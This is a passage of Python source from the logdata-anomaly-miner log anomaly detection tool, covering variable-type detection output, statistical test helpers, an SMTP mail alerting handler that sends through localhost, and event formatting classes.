bt_min_successes(self, num_bt, p, alpha): """Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return num_bt - i return 0 def bt_min_successes_multi_p(self, num_bt, p_list, alpha, event_index, var_index): """Calculate the minimal number of successes for the BT with significance alpha. p_list is a list of probabilities of successes and num_bt is the number of observed tests. """ if f'num_bt = {num_bt}, alpha = {alpha}' in self.bt_min_succ_data: # Here the min_successes are not being generated, but instead the right Indices are searched for in the bt_min_succ_data-list return np.searchsorted(self.bt_min_succ_data[f'num_bt = {num_bt}, alpha = {alpha}'], p_list, side='left', sorter=None) # Calculate the min_successes normally for each value one by one tmp_list = [] for i in range(len(self.var_type[event_index][var_index][1])): tmp_list.append(self.bt_min_successes(num_bt, p_list[i], alpha)) tmp_list = np.array(tmp_list) return tmp_list def print_initial_var_type(self, event_index, log_atom): """Print the initial variable types.""" if self.silence_output_without_confidence or self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) message = f'Initial detection of variable types of event {self.event_type_detector.get_event_type(event_index)}:' tmp_string = '' type_info = {} for var_index in range(self.length[event_index]): if self.var_type[event_index][var_index]: tmp_string += f" Path '{self.event_type_detector.variable_key_list[event_index][var_index]}': " \ 
f"{get_vt_string(self.var_type[event_index][var_index])}\n" type_info[self.event_type_detector.variable_key_list[event_index][var_index]] = self.var_type[event_index][var_index] tmp_string = tmp_string.lstrip(' ') original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [tmp_string + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [tmp_string + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': type_info, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': type_info} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) def print_changed_var_type(self, event_index, vt_old, vt_new, var_index, log_atom, confidence=None): """Print the changed variable types.""" if self.save_statistics and ((self.num_updates_until_var_reduction > 0 and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1)): self.changed_var_types.append(self.event_type_detector.num_event_lines[event_index]) if (self.silence_output_without_confidence and confidence is None) or self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = 
self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [ ' ' + self.event_type_detector.variable_key_list[event_index][var_index] + os.linesep + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'from': vt_old[0], 'to': vt_new[0], 'lines': self.event_type_detector.num_event_lines[event_index]}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'from': vt_old[0], 'to': vt_new[0], 'lines': self.event_type_detector.num_event_lines[event_index]}} vt_old_string = get_vt_string(vt_old) vt_new_string = get_vt_string(vt_new) for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', f"Variable type of path '{self.event_type_detector.variable_key_list[event_index][var_index]}' of event " f"{self.event_type_detector.get_event_type(event_index)} changed from {vt_old_string} to {vt_new_string} after the " f"{self.event_type_detector.num_event_lines[event_index]}-th analysed line", sorted_log_lines, event_data, log_atom, self) def print_reject_var_type(self, event_index, vt, var_index, log_atom): """Print the changed variable types.""" if self.silence_output_without_confidence or 
self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [ ' ' + self.event_type_detector.variable_key_list[event_index][var_index] + os.linesep + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'reject': vt[0], 'lines': self.event_type_detector.num_event_lines[event_index]}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'reject': vt[0], 'lines': self.event_type_detector.num_event_lines[event_index]}} for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', f"Variable type of path '{self.event_type_detector.variable_key_list[event_index][var_index]}' of event " f"{self.event_type_detector.get_event_type(event_index)} would reject the type '{vt[0]}' after the " f"{self.event_type_detector.num_event_lines[event_index]}-th analysed line", sorted_log_lines, event_data, log_atom, self) def print(self, message, log_atom, affected_path, confidence=None, indicator=None): """Print the message.""" if 
isinstance(affected_path, str): affected_path = [affected_path] if (self.silence_output_without_confidence and confidence is None) or ( self.silence_output_except_indicator and indicator is None): return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = '' for x in affected_path: tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + data] analysis_component = {'AffectedLogAtomPaths': affected_path} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'Confidence': confidence, 'Indicator': indicator}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[self.event_type_detector.current_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'Confidence': confidence, 'Indicator': indicator}} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. 
        """
        if AminerConfig.STAT_LEVEL == 1:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %s out of %s log atoms successfully and learned %s new variable types and updated %s variable types in the "
                "last 60 minutes.", component_name, self.log_success, self.log_total, self.log_new_learned, self.log_updated)
        elif AminerConfig.STAT_LEVEL == 2:
            logging.getLogger(STAT_LOG_NAME).info(
                "'%s' processed %s out of %s log atoms successfully and learned %s new variable types and updated %s variable types in the "
                "last 60 minutes. Following new variable types were learned: %s", component_name, self.log_success, self.log_total,
                self.log_new_learned, self.log_updated, self.log_new_learned_values)
        # Counters are reset after every report, so each log line covers only the interval since the previous call.
        self.log_success = 0
        self.log_total = 0
        self.log_new_learned = 0
        self.log_new_learned_values = []
        self.log_updated = 0


def convert_to_floats(list_in):
    """Convert every entry of list_in to float.

    @param list_in iterable of values that should be convertible by float().
    @return the list of converted floats, or an empty list as soon as one entry cannot be converted
    (the docstring of earlier versions said "false"; the actual sentinel is []).
    """
    num_list = []
    for item in list_in:
        try:
            num_list.append(float(item))
        except (ValueError, TypeError):
            return []
    return num_list


def consists_of_floats(list_in):
    """Return True if every entry of list_in is a float or an int, False otherwise.

    Note that bool is a subclass of int and therefore also passes this check.
    """
    return all(isinstance(x, (float, int)) for x in list_in)


def consists_of_ints(list_in):
    """Return True if every entry equals its int() conversion, False otherwise.

    Entries must already be numeric; int() of a non-numeric entry raises ValueError/TypeError here.
    """
    return all(item == int(item) for item in list_in)


def get_vt_string(vt):
    """Return a string which states the variable type with selected parameters.

    @param vt variable type list; vt[0] is the type tag, the remaining entries are type specific parameters
    (for 'd' vt[1] holds the values and vt[2] their relative frequencies).
    @return a human readable description; unknown tags are returned unchanged.
    """
    if vt[0] == 'stat':
        return_string = f'{vt[0]} {vt[1]}'
    elif vt[0] == 'd':
        return_string = vt[0] + ' ['
        # Only values with at least 10% share are listed; the rest is abbreviated by '...'.
        for i, val in enumerate(vt[2]):
            if val >= 0.1:
                return_string += f'"{str(vt[1][i])}"({str(int(val*100+0.5))}%), '
        if any(val < 0.1 for _, val in enumerate(vt[2])):
            return_string += '...]'
        else:
            # Strip the trailing ', ' left by the loop before closing the bracket.
            return_string = return_string[:-2]
            return_string += ']'
    elif vt[0] in ('asc', 'desc'):
        return_string = f'{vt[0]} [{vt[1]}]'
    elif vt[0] == 'unq':
        return_string = vt[0]
    elif vt[0] == 'others':
        return_string = vt[0]
    elif vt[0] == 'range':
        return_string = f'{vt[0]} [min: {vt[1]}, max: {vt[2]}]'
    elif vt[0] == 'uni':
        return_string = f'{vt[0]} [min: {vt[1]}, max: {vt[2]}]'
    elif vt[0] == 'nor':
        return_string = f'{vt[0]} [EV: {vt[1]}, SD: {vt[2]}]'
    elif vt[0] == 'spec':
        return_string = f'{vt[0]}{vt[5]} [EV: {vt[1]}, SD: {vt[2]}]'
    elif vt[0] == 'beta':
        if vt[5] == 1:
            return_string = f'{vt[0]}{vt[5]} [min: {vt[3]}, max: {vt[4]}]'
        else:
            return_string = f'{vt[0]}{vt[5]} [EV: {vt[1]}, SD: {vt[2]}]'
    elif vt[0] == 'betam':
        return_string = f'{vt[0]} [min: {vt[3]}, max: {vt[4]}, proportion: {vt[5]}]'
    else:
        return_string = vt[0]
    return return_string


def cramervonmises(rvs, cdf, args=()):
    """Return the Cramer-von Mises goodness-of-fit test statistic of the sample rvs against cdf.

    @param rvs one-dimensional sample with at least two observations.
    @param cdf a callable cdf(x, *args) or the name of a distribution looked up on `distributions`.
    @param args extra positional arguments passed to cdf.
    @raise ValueError if the sample has fewer than two observations or more than one dimension.
    """
    if isinstance(cdf, str):
        cdf = getattr(distributions, cdf).cdf
    vals = np.sort(np.asarray(rvs))
    if vals.size <= 1:
        raise ValueError('The sample must contain at least two observations.')
    if vals.ndim > 1:
        raise ValueError('The sample must be one-dimensional.')
    n = len(vals)
    cdfvals = cdf(vals, *args)
    sum_val = 0
    for i in range(n):
        sum_val += ((2*i+1)/(2*n)-cdfvals[i])**2
    return 1/(12*n) + sum_val


def cramervonmises2(rvs1, rvs2):
    """Return the Cramer-von Mises two-sample homogeneity test statistic for rvs1 and rvs2.

    @param rvs1 first one-dimensional sample with at least two observations.
    @param rvs2 second one-dimensional sample with at least two observations.
    @raise ValueError if a sample has fewer than two observations or more than one dimension.
    """
    vals1 = np.sort(np.asarray(rvs1))
    vals2 = np.sort(np.asarray(rvs2))
    if vals1.size <= 1 or vals2.size <= 1:
        raise ValueError('The sample must contain at least two observations.')
    if vals1.ndim > 1 or vals2.ndim > 1:
        raise ValueError('The sample must be one-dimensional.')
    n1 = len(vals1)
    n2 = len(vals2)
    sum_val = 0
    index1 = 0
    index2 = 0
    # Merge the two sorted samples; i is the pooled position, index1/index2 the position inside each sample.
    for i in range(n1+n2):
        # NOTE(review): with `index2 == n2-1` all remaining vals1 entries are consumed before the last vals2 entry,
        # regardless of their order; `index2 == n2` would be the plain out-of-range guard. Confirm which is intended
        # before changing it, since detector thresholds depend on this statistic.
        if index1 < n1 and (index2 == n2-1 or vals1[index1] < vals2[index2]):
            sum_val += n1*(i-index1)**2
            index1 += 1
        else:
            sum_val += n2*(i-index2)**2
            index2 += 1
    # NOTE(review): the centering term uses `1*n1*n2-1`; the textbook two-sample form is `4*n1*n2-1`.
    # Verify against the intended definition rather than silently "fixing" it.
    return sum_val/(n1*n2*(n1+n2)) - (1*n1*n2-1)/(6*(n1+n2))


def durbin_watson(rvs):
    """Return the Durbin-Watson test statistic of the sequence rvs.

    Raises ZeroDivisionError when rvs is empty or all entries are zero, because the denominator is the sum of squares.
    """
    return sum((rvs[i+1] - rvs[i])**2 for i in range(len(rvs) - 1)) / sum(rvs[i]**2 for i in range(len(rvs)))
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events/000077500000000000000000000000001500476301700305075ustar00rootroot00000000000000DefaultMailNotificationEventHandler.py000066400000000000000000000271361500476301700400501ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines the event handler for reporting via emails. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
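"""
import shlex
import time
import re
from smtplib import SMTP, SMTPException
import logging
import sys

from aminer.AminerConfig import DEBUG_LOG_NAME
from aminer.AnalysisChild import AnalysisContext
from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface
from aminer.events.EventInterfaces import EventHandlerInterface
from aminer.events.EventData import EventData


class DefaultMailNotificationEventHandler(EventHandlerInterface, TimeTriggeredComponentInterface):
    """This class implements an event record listener.

    It will pool received events, reduce the amount of events below the maximum number allowed per timeframe, create text
    representation of received events and send them via the local SMTP server on 127.0.0.1:25.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME
    CONFIG_KEY_MAIL_TARGET_ADDRESS = "MailAlerting.TargetAddress"
    CONFIG_KEY_MAIL_FROM_ADDRESS = "MailAlerting.FromAddress"
    CONFIG_KEY_MAIL_SUBJECT_PREFIX = "MailAlerting.SubjectPrefix"
    CONFIG_KEY_MAIL_ALERT_GRACE_TIME = "MailAlerting.AlertGraceTime"
    CONFIG_KEY_EVENT_COLLECT_TIME = "MailAlerting.EventCollectTime"
    CONFIG_KEY_ALERT_MIN_GAP = "MailAlerting.MinAlertGap"
    CONFIG_KEY_ALERT_MAX_GAP = "MailAlerting.MaxAlertGap"
    CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE = "MailAlerting.MaxEventsPerMessage"

    def __init__(self, analysis_context):
        """Initialize the event handler from the aminer configuration.

        @param analysis_context used to get the aminer config and the config_properties.
        @raise ValueError if the target address is missing, an address is not an e-mail address, or a numeric setting is
        negative / inconsistent.
        @raise TypeError if a setting has the wrong type (bool is rejected where int or float is expected).
        """
        handler = DefaultMailNotificationEventHandler
        self.analysis_context = analysis_context
        cp = analysis_context.aminer_config.config_properties
        # @see https://emailregex.com/
        is_email = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$")
        # Check for a missing address BEFORE quoting: shlex.quote(None) returns "''", so a check on the quoted value
        # can never see None and the intended error message was unreachable.
        recipient_address = cp.get(handler.CONFIG_KEY_MAIL_TARGET_ADDRESS)
        if recipient_address is None:
            msg = "Cannot create e-mail notification listener without target address"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.recipient_address = shlex.quote(recipient_address)
        self.sender_address = shlex.quote(cp.get(handler.CONFIG_KEY_MAIL_FROM_ADDRESS))
        # The regex is applied to the quoted values: anything shlex considers unsafe (whitespace, newlines, ...) gets
        # wrapped in single quotes and therefore fails the address pattern, so header-relevant characters are rejected.
        if not is_email.match(self.recipient_address) or not is_email.match(self.sender_address):
            msg = "MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        prefix = cp.get(handler.CONFIG_KEY_MAIL_SUBJECT_PREFIX, "AMiner Alerts:")
        if not isinstance(prefix, str):
            msg = "MailAlerting.SubjectPrefix must be of type string!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # Kept for compatibility: a prefix containing spaces (the default included) ends up single-quoted in the subject.
        self.subject_prefix = shlex.quote(prefix)
        self.alert_grace_time_end = cp.get(handler.CONFIG_KEY_MAIL_ALERT_GRACE_TIME, 0)
        if isinstance(self.alert_grace_time_end, bool) or not isinstance(self.alert_grace_time_end, (int, float)):
            msg = "MailAlerting.AlertGraceTime must be of type int or float!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # Zero is accepted by all the "greater than zero" checks below; only negative values are rejected.
        if self.alert_grace_time_end < 0:
            msg = "MailAlerting.AlertGraceTime must be greater than zero!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if self.alert_grace_time_end > 0:
            # Convert the configured grace period into an absolute end time; 0 means "no grace period".
            self.alert_grace_time_end += time.time()
        self.event_collect_time = cp.get(handler.CONFIG_KEY_EVENT_COLLECT_TIME, 10)
        if isinstance(self.event_collect_time, bool) or not isinstance(self.event_collect_time, (int, float)):
            msg = "MailAlerting.EventCollectTime must be of type int or float!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if self.event_collect_time < 0:
            msg = "MailAlerting.EventCollectTime must be greater than zero!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.min_alert_gap = cp.get(handler.CONFIG_KEY_ALERT_MIN_GAP, 600)
        if isinstance(self.min_alert_gap, bool) or not isinstance(self.min_alert_gap, (int, float)):
            msg = "MailAlerting.MinAlertGap must be of type int or float!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if self.min_alert_gap < 0:
            msg = "MailAlerting.MinAlertGap must be greater than zero!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.max_alert_gap = cp.get(handler.CONFIG_KEY_ALERT_MAX_GAP, 600)
        if isinstance(self.max_alert_gap, bool) or not isinstance(self.max_alert_gap, (int, float)):
            msg = "MailAlerting.MaxAlertGap must be of type int or float!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if self.max_alert_gap < 0:
            msg = "MailAlerting.MaxAlertGap must be greater than zero!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if self.max_alert_gap < self.min_alert_gap:
            msg = "MailAlerting.MaxAlertGap must be greater than MailAlerting.MinAlertGap!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        self.max_events_per_message = cp.get(handler.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, 1000)
        if isinstance(self.max_events_per_message, bool) or not isinstance(self.max_events_per_message, (int, float)):
            msg = "MailAlerting.MaxEventsPerMessage must be of type int or float!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if self.max_events_per_message < 1:
            msg = "MailAlerting.MaxEventsPerMessage must be greater than zero!"
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        # Pooling state: number of events in the pending message, the wall-clock time the first of them arrived,
        # when the previous mail went out, when the next one is due (0 = nothing scheduled), the current back-off gap
        # between mails, and the accumulated text body.
        self.events_collected = 0
        self.event_collection_start_time = 0
        self.last_alert_time = 0
        self.next_alert_time = 0
        self.current_alert_gap = self.min_alert_gap
        self.current_message = ""

    def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source):
        """
        Receive information about a detected event and pool it for the next notification mail.

        @param event_type is a string with the event type class this event belongs to. This information can be used to
        interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used
        to create generic log messages.
        @param event_message the first output line of the event.
        @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available
        to the time of the event. The list has to contain at least one line.
        @param event_data type-specific event data object, should not be used unless listener really knows about the
        event_type.
        @param log_atom the log atom which produced the event.
        @param event_source reference to detector generating the event.
        @return True in every case, also when the event was ignored (grace period, suppressed detector, not addressed to
        this handler).
        """
        if hasattr(event_source, "output_event_handlers") and event_source.output_event_handlers is not None and self not in \
                event_source.output_event_handlers:
            return True
        if self.alert_grace_time_end != 0:
            if self.alert_grace_time_end >= time.time():
                return True
            # Grace period is over; disable it permanently.
            self.alert_grace_time_end = 0
        component_name = self.analysis_context.get_name_by_component(event_source)
        if component_name in self.analysis_context.suppress_detector_list:
            return True
        # Avoid too many calls to the operating system time()
        current_time = time.time()
        # Events beyond max_events_per_message are still counted towards scheduling below but no longer appended,
        # which bounds the size of a single mail.
        if self.events_collected < self.max_events_per_message:
            if self.events_collected == 0:
                self.event_collection_start_time = current_time
            self.events_collected += 1
            event_data_obj = EventData(event_type, event_message, sorted_loglines, event_data, log_atom, event_source,
                                       self.analysis_context)
            self.current_message += event_data_obj.receive_event_string()
        if self.next_alert_time == 0:
            if self.last_alert_time != 0:
                # This is the first event received after sending of a previous notification. If the currentAlertGap has not elapsed,
                # increase the gap immediately.
                self.next_alert_time = self.last_alert_time + self.current_alert_gap
                if self.next_alert_time < current_time:
                    # We are already out of the required gap.
                    self.current_alert_gap = self.min_alert_gap
                    self.last_alert_time = 0
                    self.next_alert_time = current_time + self.event_collect_time
                else:
                    # Increase the gap
                    self.current_alert_gap *= 1.5
                    if self.current_alert_gap > self.max_alert_gap:
                        self.current_alert_gap = self.max_alert_gap
            else:
                # No relevant last alert time recorded, just use default.
                self.next_alert_time = current_time + self.event_collect_time
        if (self.next_alert_time != 0) and (current_time >= self.next_alert_time):
            self.send_notification(current_time)
        return True

    def do_timer(self, trigger_time):
        """Send the pending notification when its due time has passed.

        @param trigger_time the current time as supplied by the timer framework.
        @return 10, the number of seconds until the next invocation.
        """
        if (self.next_alert_time != 0) and (trigger_time >= self.next_alert_time):
            self.send_notification(trigger_time)
        return 10

    def send_notification(self, trigger_time):
        """Really send out the pooled message via the local SMTP server and reset the pooling state.

        @param trigger_time the time the sending was triggered; becomes last_alert_time.
        Delivery failures are logged and the pooled events are discarded (no retry), so the analysis loop is never
        blocked or aborted by a missing or misbehaving MTA.
        """
        if self.events_collected == 0:
            return
        subject_text = f"{self.subject_prefix} Collected Events"
        if self.last_alert_time != 0:
            subject_text += f" in the last {trigger_time - self.last_alert_time} seconds"
        # The log-derived text is placed after the blank line, i.e. in the body only; smtplib applies the
        # line-ending and leading-dot normalisation required by the SMTP DATA command.
        message = "From: %s\nTo: %s\nSubject: %s\n\n%s\n" % (
            self.sender_address, self.recipient_address, subject_text, self.current_message)
        try:
            # The short timeout keeps a stalled MTA from blocking the analysis loop; the context manager issues QUIT and
            # closes the socket on the success and on the error path (the previous code leaked the connection when
            # sendmail() raised).
            with SMTP("127.0.0.1", port=25, timeout=5) as smtp_obj:
                smtp_obj.sendmail(self.sender_address, self.recipient_address, message)
        except (SMTPException, OSError) as e:
            # OSError covers a refused connection and a socket timeout, which smtplib does not wrap in SMTPException;
            # previously these propagated out of receive_event()/do_timer().
            print(e, file=sys.stderr)
            logging.getLogger(DEBUG_LOG_NAME).error(e)
        self.last_alert_time = trigger_time
        self.events_collected = 0
        self.current_message = ""
        self.next_alert_time = 0
        logging.getLogger(DEBUG_LOG_NAME).debug("%s sent notification.", self.__class__.__name__)
logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events/EventData.py000066400000000000000000000074541500476301700327460ustar00rootroot00000000000000""" This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 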
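This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
"""
from datetime import datetime
from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX
from aminer import AminerConfig


class EventData:
    """This class is used to create a string for different event handlers."""

    def __init__(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source, analysis_context):
        """
        Receive information about a detected event.

        @param event_type is a string with the event type class this event belongs to. This information can be used to
        interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used
        to create generic log messages.
        @param event_message the first output line of the event.
        @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available
        to the time of the event. The list has to contain at least one line.
        @param event_data type-specific event data object, should not be used unless listener really knows about the
        event_type.
        @param log_atom the log atom which produced the event; when None, no log_atom attribute is set on the instance.
        @param event_source reference to detector generating the event.
        @param analysis_context the analysis context used to get the component name; may be None.
        """
        self.event_type = event_type
        self.event_message = event_message
        self.sorted_log_lines = sorted_loglines
        self.event_data = event_data
        self.event_source = event_source
        self.analysis_context = analysis_context
        if analysis_context is not None:
            self.description = f'"{analysis_context.get_name_by_component(event_source)}"'
        else:
            self.description = ""
        if log_atom is None:
            return
        # Only set when a log atom exists; receive_event_string() tests for the attribute with hasattr().
        self.log_atom = log_atom

    def receive_event_string(self):
        """Build the textual representation of the event.

        @return the header line(s) followed by the (indented) log lines. Byte lines are decoded with the configured
        encoding; a line that is not valid in that encoding is rendered with repr() instead of aborting the report.
        """
        message = ""
        if self.event_message is not None:
            indent = " "
            if hasattr(self, "log_atom"):
                if self.log_atom.get_timestamp() is not None:
                    message += f"{datetime.fromtimestamp(self.log_atom.get_timestamp()).strftime('%Y-%m-%d %H:%M:%S')} "
                message += f"{self.event_message}\n"
                message += f"{self.event_source.__class__.__name__}: {self.description} ({len(self.sorted_log_lines)} lines)\n"
            else:
                message += f"{self.event_message} ({len(self.sorted_log_lines)} lines)\n"
        else:
            indent = ""
        for line in self.sorted_log_lines:
            if isinstance(line, bytes):
                if line != b"":
                    try:
                        decoded_line = line.decode(AminerConfig.ENCODING)
                    except UnicodeError:
                        # Log data is untrusted input: one undecodable line must not abort event reporting for every
                        # handler downstream. Fall back to the escaped representation, as the detectors do for raw_data.
                        decoded_line = repr(line)
                    message += indent + decoded_line + "\n"
            else:
                # analysis_context may be None (see __init__); then no log line prefix is configured.
                original_log_line_prefix = None
                if self.analysis_context is not None:
                    original_log_line_prefix = self.analysis_context.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX)
                if original_log_line_prefix is not None and line.startswith(original_log_line_prefix):
                    message += line + "\n"
                elif line != "":
                    message += indent + line + "\n"
        if self.event_message is None:
            # remove last newline
            message = message[:-1]
        return message
EventInterfaces.py000066400000000000000000000064771500476301700341050ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This file contains interface definition useful implemented by classes in this directory and for use from code outside this directory. All classes are defined in separate files, only the namespace references are added here to simplify the code. 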
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc class EventHandlerInterface(metaclass=abc.ABCMeta): """This is the common interface of all components that can be notified on significant log data mining events. To avoid interference with the analysis process, the listener may only perform fast actions within the call. Longer running tasks have to be performed asynchronously. """ @abc.abstractmethod def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ class EventSourceInterface(metaclass=abc.ABCMeta): """This is the common interface of all event sources. 
